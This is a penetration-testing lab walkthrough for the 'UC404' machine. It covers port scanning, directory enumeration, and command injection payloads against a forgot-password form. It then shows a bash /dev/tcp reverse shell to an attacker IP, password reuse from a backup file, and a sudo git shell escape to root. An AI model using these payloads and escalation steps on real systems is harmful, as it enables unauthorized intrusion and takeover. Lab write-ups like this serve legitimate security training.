																			                        UC404 Walkthrough
													
Attacker's Machine: 192.168.45.5
Victim's Machine: 192.168.204.109
export IP=192.168.204.109
	
nmap -Pn -p- -n  --min-rate 1000 $IP --stats-every=5s

22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
41473/tcp open  unknown
45259/tcp open  unknown
49415/tcp open  unknown
54505/tcp open  unknown

nmap -Pn -n -sC -sV -p22,80,111,2049,41473,45259,49415,54505 $IP --open --stats-every=5s -oN results.txt

22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: AdminLTE 3 | Dashboard
| http-git: 
|   192.168.214.109:80/.git/
       https://github.com/ColorlibHQ/AdminLTE.git
|_    Project type: Ruby on Rails web application (guessed from .gitignore)
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      32936/udp   mountd
|   100005  1,2,3      41849/tcp6  mountd
|   100005  1,2,3      41985/udp6  mountd
|   100005  1,2,3      54505/tcp   mountd
|   100021  1,3,4      34331/udp6  nlockmgr
|   100021  1,3,4      41473/tcp   nlockmgr
|   100021  1,3,4      46067/tcp6  nlockmgr
|   100021  1,3,4      56514/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
41473/tcp open  nlockmgr 1-4 (RPC #100021)
45259/tcp open  mountd   1-3 (RPC #100005)
49415/tcp open  mountd   1-3 (RPC #100005)
54505/tcp open  mountd   1-3 (RPC #100005)


nmap -sU -n -Pn $IP --top-ports=100 --stats-every=5s --min-rate 1000
111/udp  open   rpcbind
2049/udp open   nfs

 
 Vulnerability Assessment

nmap -n $IP -p 80 -sV --script vuln --stats-every=5s 


nikto --url $IP -p 80


Port 80 
Enumeration
gobuster dir -u http://$IP -w /usr/share/wordlists/find_me.txt -t 40 
/.git                               (Status: 301) [Size: 317] [--> http://192.168.201.109/.git/]
/.git/config                    (Status: 200) [Size: 267]
/.gitattributes                (Status: 200) [Size: 43]
/.gitignore                     (Status: 200) [Size: 1213]
/.git/logs/                     (Status: 200) [Size: 1134]
/.git/index                    (Status: 200) [Size: 255246]
/build                           (Status: 301) [Size: 318] [--> http://192.168.201.109/build/]
/db                               (Status: 301) [Size: 315] [--> http://192.168.201.109/db/]
/pages                          (Status: 301) [Size: 318] [--> http://192.168.201.109/pages/]
/demo                          (Status: 301) [Size: 317] [--> http://192.168.201.109/demo/]
/dist                             (Status: 301) [Size: 317] [--> http://192.168.201.109/dist/]
/docs                            (Status: 301) [Size: 317] [--> http://192.168.201.109/docs/]
/index.html                  (Status: 200) [Size: 60628]
/plugins                       (Status: 301) [Size: 320] [--> http://192.168.201.109/plugins/]
/under_construction    (Status: 301) [Size: 331] [--> http://192.168.201.109/under_construction/]


# Discovered Adminer 4.7.7 login page
http://192.168.214.109/db/?server=localhost
System: ClickHouse (alpha)
Server: localhost
Username: admin
Password: admin

# Another login page discovered through enumeration. Waste of time, you can only register, but not login!
   Created account urs, urs@gmail.com, 123456
http://192.168.214.109/under_construction/

# AdminLTE3 Dashboard. No know vulnerabilities for AdminLTE3
http://192.168.201.109/

Port 2049
# Checking for mounted folders
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 111 $IP 

111/tcp open  rpcbind
|_nfs-showmount: No NFS mounts available

showmount -e $IP
Export list for 192.168.201.109:

# I guess we've back the square one again. Let's check our the http://192.168.214.109/under_construction/ again, enumerate and check the source code.
   While check out the FOrgot Password feature, we find some interesting comments in the source code.
   
http://192.168.204.109/under_construction/forgot.php

sendmail.php must receive the variable from the html form and send the message.

|| For security reasons we are working to blacklist some characters ||

Could not open input file: sendmail.php
1

# Intercept the request in burp while trying to use a random email address and check for command injection.
    Change the request method from POST to GET.
    
GET /under_construction/forgot.php?email=1%40gmail.com||id HTTP/1.1

or 

GET /under_construction/forgot.php?email=%0aid                            # URL encoding %0a = encoded form of the newline character (\n).

or 

GET /under_construction/forgot.php?email=%7cid                            # URL encoding %7c = encoded form of the pipe character ( | ).



Could not open input file: sendmail.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
0

# Now that we have command injection, let's try to obtain a shell using the payload bash -c "bash -i >/dev/tcp/192.168.45.5/2049 0>&1 2>&1"

GET /under_construction/forgot.php?email=1%40gmail.com||bash+-c+"bash+-i+>/dev/tcp/192.168.45.5/2049+0>%261+2>%261" HTTP/1.1

nc -lvnp 2049                        # Got shell

cd /var/www
cat local.txt                              # Flag: c50dce93e13d1a95341af56a0f755a15


Privilege escalation

cd /var/backups
cat sendmail.php.bak

$connect=mysql_connect("localhost","brian","BrianIsOnTheAir789") or die("Could not connect to database");

# Since we don't have a db to connect to, let's try password reuse to check if we get access to brian's account

su brian
BrianIsOnTheAir789                             # Nice, we got access

sudo -l
User brian may run the following commands on UC404:
    (ALL) NOPASSWD: /usr/bin/git
    
# Gtfobin it

sudo git -p help config

# Paste 

!/bin/sh
